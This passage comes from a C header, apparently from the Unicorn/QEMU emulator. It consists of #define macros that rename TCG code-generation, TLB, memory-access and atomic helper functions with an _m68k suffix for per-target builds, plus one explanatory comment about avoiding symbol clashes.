tcg_gen_smin_i64_m68k #define tcg_gen_umin_i64 tcg_gen_umin_i64_m68k #define tcg_gen_smax_i64 tcg_gen_smax_i64_m68k #define tcg_gen_umax_i64 tcg_gen_umax_i64_m68k #define tcg_gen_abs_i64 tcg_gen_abs_i64_m68k #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_m68k #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_m68k #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_m68k #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_m68k #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_m68k #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_m68k #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_m68k #define tcg_gen_exit_tb tcg_gen_exit_tb_m68k #define tcg_gen_goto_tb tcg_gen_goto_tb_m68k #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_m68k #define check_exit_request check_exit_request_m68k #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_m68k #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_m68k #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_m68k #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_m68k #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_m68k #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_m68k #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_m68k #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_m68k #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_m68k #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_m68k #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_m68k #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_m68k #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_m68k #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_m68k #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_m68k #define tcg_gen_atomic_fetch_smin_i64 
tcg_gen_atomic_fetch_smin_i64_m68k #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_m68k #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_m68k #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_m68k #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_m68k #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_m68k #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_m68k #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_m68k #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_m68k #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_m68k #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_m68k #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_m68k #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_m68k #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_m68k #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_m68k #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_m68k #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_m68k #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_m68k #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_m68k #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_m68k #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_m68k #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_m68k #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_m68k #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_m68k #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_m68k #define simd_desc simd_desc_m68k #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_m68k #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_m68k #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_m68k #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_m68k #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_m68k #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_m68k #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_m68k #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_m68k #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_m68k #define tcg_gen_gvec_2 tcg_gen_gvec_2_m68k #define tcg_gen_gvec_2i tcg_gen_gvec_2i_m68k #define tcg_gen_gvec_2s tcg_gen_gvec_2s_m68k #define tcg_gen_gvec_3 tcg_gen_gvec_3_m68k #define tcg_gen_gvec_3i tcg_gen_gvec_3i_m68k #define tcg_gen_gvec_4 tcg_gen_gvec_4_m68k #define tcg_gen_gvec_mov tcg_gen_gvec_mov_m68k #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_m68k #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_m68k #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_m68k #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_m68k #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_m68k #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_m68k #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_m68k #define tcg_gen_gvec_not tcg_gen_gvec_not_m68k #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_m68k #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_m68k #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_m68k #define tcg_gen_gvec_add tcg_gen_gvec_add_m68k #define tcg_gen_gvec_adds tcg_gen_gvec_adds_m68k #define tcg_gen_gvec_addi tcg_gen_gvec_addi_m68k #define tcg_gen_gvec_subs tcg_gen_gvec_subs_m68k #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_m68k #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_m68k #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_m68k #define tcg_gen_gvec_sub tcg_gen_gvec_sub_m68k 
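/* ------------------------------------------------------------------ */
/* Editor's note (a sketch, not generated content): each #define in   */
/* this header renames one shared QEMU/TCG symbol with the _m68k      */
/* suffix, so the same sources can be compiled once per target and    */
/* statically linked into a single Unicorn library without duplicate- */
/* symbol clashes.  For example, shared code defining (signature      */
/* assumed here for illustration)                                     */
/*     void uc_init(struct uc_struct *uc) { ... }                     */
/* is emitted by this target's build as                               */
/*     void uc_init_m68k(struct uc_struct *uc) { ... }                */
/* while the arm/x86/... builds emit uc_init_arm, uc_init_x86, and    */
/* so on.  Host TCG backend globals (e.g. have_avx2, s390_facilities) */
/* appear here too, presumably because the backend objects are also   */
/* rebuilt once per target.                                           */
/* ------------------------------------------------------------------ */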
#define tcg_gen_gvec_mul tcg_gen_gvec_mul_m68k #define tcg_gen_gvec_muls tcg_gen_gvec_muls_m68k #define tcg_gen_gvec_muli tcg_gen_gvec_muli_m68k #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_m68k #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_m68k #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_m68k #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_m68k #define tcg_gen_gvec_smin tcg_gen_gvec_smin_m68k #define tcg_gen_gvec_umin tcg_gen_gvec_umin_m68k #define tcg_gen_gvec_smax tcg_gen_gvec_smax_m68k #define tcg_gen_gvec_umax tcg_gen_gvec_umax_m68k #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_m68k #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_m68k #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_m68k #define tcg_gen_gvec_neg tcg_gen_gvec_neg_m68k #define tcg_gen_gvec_abs tcg_gen_gvec_abs_m68k #define tcg_gen_gvec_and tcg_gen_gvec_and_m68k #define tcg_gen_gvec_or tcg_gen_gvec_or_m68k #define tcg_gen_gvec_xor tcg_gen_gvec_xor_m68k #define tcg_gen_gvec_andc tcg_gen_gvec_andc_m68k #define tcg_gen_gvec_orc tcg_gen_gvec_orc_m68k #define tcg_gen_gvec_nand tcg_gen_gvec_nand_m68k #define tcg_gen_gvec_nor tcg_gen_gvec_nor_m68k #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_m68k #define tcg_gen_gvec_ands tcg_gen_gvec_ands_m68k #define tcg_gen_gvec_andi tcg_gen_gvec_andi_m68k #define tcg_gen_gvec_xors tcg_gen_gvec_xors_m68k #define tcg_gen_gvec_xori tcg_gen_gvec_xori_m68k #define tcg_gen_gvec_ors tcg_gen_gvec_ors_m68k #define tcg_gen_gvec_ori tcg_gen_gvec_ori_m68k #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_m68k #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_m68k #define tcg_gen_gvec_shli tcg_gen_gvec_shli_m68k #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_m68k #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_m68k #define tcg_gen_gvec_shri tcg_gen_gvec_shri_m68k #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_m68k #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_m68k #define tcg_gen_gvec_sari tcg_gen_gvec_sari_m68k #define tcg_gen_gvec_shls tcg_gen_gvec_shls_m68k #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_m68k #define tcg_gen_gvec_sars tcg_gen_gvec_sars_m68k #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_m68k #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_m68k #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_m68k #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_m68k #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_m68k #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_m68k #define vec_gen_2 vec_gen_2_m68k #define vec_gen_3 vec_gen_3_m68k #define vec_gen_4 vec_gen_4_m68k #define tcg_gen_mov_vec tcg_gen_mov_vec_m68k #define tcg_const_zeros_vec tcg_const_zeros_vec_m68k #define tcg_const_ones_vec tcg_const_ones_vec_m68k #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_m68k #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_m68k #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_m68k #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_m68k #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_m68k #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_m68k #define tcg_gen_dupi_vec tcg_gen_dupi_vec_m68k #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_m68k #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_m68k #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_m68k #define tcg_gen_ld_vec tcg_gen_ld_vec_m68k #define tcg_gen_st_vec tcg_gen_st_vec_m68k #define tcg_gen_stl_vec tcg_gen_stl_vec_m68k #define tcg_gen_and_vec tcg_gen_and_vec_m68k #define tcg_gen_or_vec tcg_gen_or_vec_m68k #define tcg_gen_xor_vec tcg_gen_xor_vec_m68k #define tcg_gen_andc_vec tcg_gen_andc_vec_m68k #define 
tcg_gen_orc_vec tcg_gen_orc_vec_m68k #define tcg_gen_nand_vec tcg_gen_nand_vec_m68k #define tcg_gen_nor_vec tcg_gen_nor_vec_m68k #define tcg_gen_eqv_vec tcg_gen_eqv_vec_m68k #define tcg_gen_not_vec tcg_gen_not_vec_m68k #define tcg_gen_neg_vec tcg_gen_neg_vec_m68k #define tcg_gen_abs_vec tcg_gen_abs_vec_m68k #define tcg_gen_shli_vec tcg_gen_shli_vec_m68k #define tcg_gen_shri_vec tcg_gen_shri_vec_m68k #define tcg_gen_sari_vec tcg_gen_sari_vec_m68k #define tcg_gen_cmp_vec tcg_gen_cmp_vec_m68k #define tcg_gen_add_vec tcg_gen_add_vec_m68k #define tcg_gen_sub_vec tcg_gen_sub_vec_m68k #define tcg_gen_mul_vec tcg_gen_mul_vec_m68k #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_m68k #define tcg_gen_usadd_vec tcg_gen_usadd_vec_m68k #define tcg_gen_sssub_vec tcg_gen_sssub_vec_m68k #define tcg_gen_ussub_vec tcg_gen_ussub_vec_m68k #define tcg_gen_smin_vec tcg_gen_smin_vec_m68k #define tcg_gen_umin_vec tcg_gen_umin_vec_m68k #define tcg_gen_smax_vec tcg_gen_smax_vec_m68k #define tcg_gen_umax_vec tcg_gen_umax_vec_m68k #define tcg_gen_shlv_vec tcg_gen_shlv_vec_m68k #define tcg_gen_shrv_vec tcg_gen_shrv_vec_m68k #define tcg_gen_sarv_vec tcg_gen_sarv_vec_m68k #define tcg_gen_shls_vec tcg_gen_shls_vec_m68k #define tcg_gen_shrs_vec tcg_gen_shrs_vec_m68k #define tcg_gen_sars_vec tcg_gen_sars_vec_m68k #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_m68k #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_m68k #define tb_htable_lookup tb_htable_lookup_m68k #define tb_set_jmp_target tb_set_jmp_target_m68k #define cpu_exec cpu_exec_m68k #define cpu_loop_exit_noexc cpu_loop_exit_noexc_m68k #define cpu_reloading_memory_map cpu_reloading_memory_map_m68k #define cpu_loop_exit cpu_loop_exit_m68k #define cpu_loop_exit_restore cpu_loop_exit_restore_m68k #define cpu_loop_exit_atomic cpu_loop_exit_atomic_m68k #define tlb_init tlb_init_m68k #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_m68k #define tlb_flush tlb_flush_m68k #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_m68k #define tlb_flush_all_cpus tlb_flush_all_cpus_m68k #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_m68k #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_m68k #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_m68k #define tlb_flush_page tlb_flush_page_m68k #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_m68k #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_m68k #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_m68k #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_m68k #define tlb_protect_code tlb_protect_code_m68k #define tlb_unprotect_code tlb_unprotect_code_m68k #define tlb_reset_dirty tlb_reset_dirty_m68k #define tlb_set_dirty tlb_set_dirty_m68k #define tlb_set_page_with_attrs tlb_set_page_with_attrs_m68k #define tlb_set_page tlb_set_page_m68k #define get_page_addr_code_hostp get_page_addr_code_hostp_m68k #define get_page_addr_code get_page_addr_code_m68k #define probe_access probe_access_m68k #define tlb_vaddr_to_host tlb_vaddr_to_host_m68k #define helper_ret_ldub_mmu helper_ret_ldub_mmu_m68k #define helper_le_lduw_mmu helper_le_lduw_mmu_m68k #define helper_be_lduw_mmu helper_be_lduw_mmu_m68k #define helper_le_ldul_mmu helper_le_ldul_mmu_m68k #define helper_be_ldul_mmu helper_be_ldul_mmu_m68k #define helper_le_ldq_mmu helper_le_ldq_mmu_m68k #define helper_be_ldq_mmu helper_be_ldq_mmu_m68k #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_m68k #define helper_le_ldsw_mmu helper_le_ldsw_mmu_m68k #define 
helper_be_ldsw_mmu helper_be_ldsw_mmu_m68k #define helper_le_ldsl_mmu helper_le_ldsl_mmu_m68k #define helper_be_ldsl_mmu helper_be_ldsl_mmu_m68k #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_m68k #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_m68k #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_m68k #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_m68k #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_m68k #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_m68k #define cpu_ldub_data_ra cpu_ldub_data_ra_m68k #define cpu_ldsb_data_ra cpu_ldsb_data_ra_m68k #define cpu_lduw_data_ra cpu_lduw_data_ra_m68k #define cpu_ldsw_data_ra cpu_ldsw_data_ra_m68k #define cpu_ldl_data_ra cpu_ldl_data_ra_m68k #define cpu_ldq_data_ra cpu_ldq_data_ra_m68k #define cpu_ldub_data cpu_ldub_data_m68k #define cpu_ldsb_data cpu_ldsb_data_m68k #define cpu_lduw_data cpu_lduw_data_m68k #define cpu_ldsw_data cpu_ldsw_data_m68k #define cpu_ldl_data cpu_ldl_data_m68k #define cpu_ldq_data cpu_ldq_data_m68k #define helper_ret_stb_mmu helper_ret_stb_mmu_m68k #define helper_le_stw_mmu helper_le_stw_mmu_m68k #define helper_be_stw_mmu helper_be_stw_mmu_m68k #define helper_le_stl_mmu helper_le_stl_mmu_m68k #define helper_be_stl_mmu helper_be_stl_mmu_m68k #define helper_le_stq_mmu helper_le_stq_mmu_m68k #define helper_be_stq_mmu helper_be_stq_mmu_m68k #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_m68k #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_m68k #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_m68k #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_m68k #define cpu_stb_data_ra cpu_stb_data_ra_m68k #define cpu_stw_data_ra cpu_stw_data_ra_m68k #define cpu_stl_data_ra cpu_stl_data_ra_m68k #define cpu_stq_data_ra cpu_stq_data_ra_m68k #define cpu_stb_data cpu_stb_data_m68k #define cpu_stw_data cpu_stw_data_m68k #define cpu_stl_data cpu_stl_data_m68k #define cpu_stq_data cpu_stq_data_m68k #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_m68k #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_m68k #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_m68k #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_m68k #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_m68k #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_m68k #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_m68k #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_m68k #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_m68k #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_m68k #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_m68k #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_m68k #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_m68k #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_m68k #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_m68k #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_m68k #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_m68k #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_m68k #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_m68k #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_m68k #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_m68k #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_m68k #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_m68k #define helper_atomic_fetch_xorw_le_mmu 
helper_atomic_fetch_xorw_le_mmu_m68k #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_m68k #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_m68k #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_m68k #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_m68k #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_m68k #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_m68k #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_m68k #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_m68k #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_m68k #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_m68k #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_m68k #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_m68k #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_m68k #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_m68k #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_m68k #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_m68k #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_m68k #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_m68k #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_m68k #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_m68k #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_m68k #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_m68k #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_m68k #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_m68k #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_m68k #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_m68k #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_m68k #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_m68k #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_m68k #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_m68k #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_m68k #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_m68k #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_m68k #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_m68k #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_m68k #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_m68k #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_m68k #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_m68k #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_m68k #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_m68k #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_m68k #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_m68k #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_m68k #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_m68k #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_m68k #define helper_atomic_umin_fetchl_le_mmu 
helper_atomic_umin_fetchl_le_mmu_m68k #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_m68k #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_m68k #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_m68k #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_m68k #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_m68k #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_m68k #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_m68k #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_m68k #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_m68k #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_m68k #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_m68k #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_m68k #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_m68k #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_m68k #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_m68k #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_m68k #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_m68k #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_m68k #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_m68k #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_m68k #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_m68k #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_m68k #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_m68k #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_m68k #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_m68k #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_m68k #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_m68k #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_m68k #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_m68k #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_m68k #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_m68k #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_m68k #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_m68k #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_m68k #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_m68k #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_m68k #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_m68k #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_m68k #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_m68k #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_m68k #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_m68k #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_m68k #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_m68k #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_m68k #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_m68k #define helper_atomic_xor_fetchq_be_mmu 
